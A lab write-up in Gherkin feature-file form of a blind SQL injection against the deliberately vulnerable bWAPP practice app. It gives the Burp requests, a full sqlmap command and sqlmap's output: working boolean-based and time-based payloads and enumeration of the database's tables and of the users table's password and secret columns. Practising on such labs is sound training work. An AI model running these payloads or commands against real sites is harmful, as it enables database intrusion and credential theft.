# language: en

Feature: SQL Injection Blind SQLite
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

  Background:
    Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
    And I am using Firefox 52.7.3 (64-bit)
    And I am running Burp Suite Community edition v1.7.30
    And I am running sqlmap
    Given the following
    """
    URL: http://localhost/bWAPP/sqli_14.php
    Message: SQL Injection Blind (SQLite)
    Details:
    - Search for a movie
    - Output: exist or does not exist
    - Search button
    Objective: Perform a Blind SQL injection on SQLite
    """

  Scenario: Blind SQLi SQLite
    Given the site, I make an initial test
      """
      # Test case #1, fail attempt
      # Burp Request
      GET /bWAPP/sqli_14.php?title=iron&action=search HTTP/1.1

      # Response
      </form>
      The movie does not exist in our database!</div>

      # Test case #2, success attempt
      # Burp Request
      GET /bWAPP/sqli_14.php?title=iron+man&action=search HTTP/1.1

      # Response
      </form>
      The movie exists in our database!</div>

      # That's all the information we are going to get from it
      """
    Then I gather the following information for sqlmap:
      """
      # sqlmap params preparation
      # -u url: http://192.168.75.128/bWAPP/sqli_14.php
      # --cookie: security_level=0; PHPSESSID=b2b7180ff8ec54f37e9adce09e70453d
      # --data: title=iron&action=search
      """
    And I prepare this command:
      """
      # sqlmap command
      # sqlmap -u "http://192.168.75.128/bWAPP/sqli_14.php"
      # --cookie="security_level=0; PHPSESSID=b2b7180ff8ec54f37e9adce09e70453d"
      # --data="title=iron&action=search" --batch -D sqlite --risk 3 --level 3
      # Params:
      # --batch: Never ask for user input, use the default behaviour
      # --D: DBMS database to enumerate
      # --T: TBL DBMS database table(s) to enumerate
      # --dbs: Enumerate DBMS databases
      # --tables: Enumerate DBMS database tables
      """
    Then I launch it
    And I get the following output
      """
      # sqlmap injection
      # It gathers two injections
      Parameter: title (POST)
      Type: boolean-based blind
      Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
      Payload: title=iron' OR NOT 3279=3279-- coeW&action=search

      Type: AND/OR time-based blind
      Title: SQLite > 2.0 OR time-based blind (heavy query - comment)
      Payload: title=iron' OR 5029=LIKE('ABCDEFG',
      UPPER(HEX(RANDOMBLOB(500000000/2))))--&action=search

      # Then from this, let's try to enumerate tables and users
      """
    Then I append the --dbs --tables
      """
      # Enumerating tables
      [08:42:18] [INFO] retrieved: 4
      [08:42:18] [INFO] retrieved: blog
      [08:42:18] [INFO] retrieved: heroes
      [08:42:18] [INFO] retrieved: movies
      [08:42:19] [INFO] retrieved: users
      Database: SQLite_masterdb
      [4 tables]
      +--------+
      | blog   |
      | heroes |
      | movies |
      | users  |
      +--------+
      """
    And then I enumerate columns in users table
      """
      [9 columns]
      +-----------------+---------+
      | Column          | Type    |
      +-----------------+---------+
      | activated       | tinyint |
      | activation_code | varchar |
      | admin           | tinyint |
      | email           | varchar |
      | id              | int     |
      | login           | varchar |
      | password        | varchar |
      | reset_code      | varchar |
      | secret          | varchar |
      +-----------------+---------+
      """
